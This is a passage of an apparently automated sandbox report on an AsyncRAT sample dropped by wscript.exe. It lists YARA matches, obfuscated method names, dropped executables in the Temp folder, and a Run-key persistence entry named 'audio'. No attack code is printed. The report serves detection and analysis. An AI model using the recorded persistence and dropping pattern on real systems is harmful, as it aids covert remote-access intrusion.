                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: 4.3.NaE.exe.782700.0.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: 4.2.NaE.exe.21223f6.2.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: 4.2.NaE.exe.22d0f08.3.raw.unpack, aojoPCkCOYi3rvl9Ad.csHigh entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\NaE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeFile created: C:\Users\user\AppData\Local\Temp\audio.exeJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audioJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audioJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
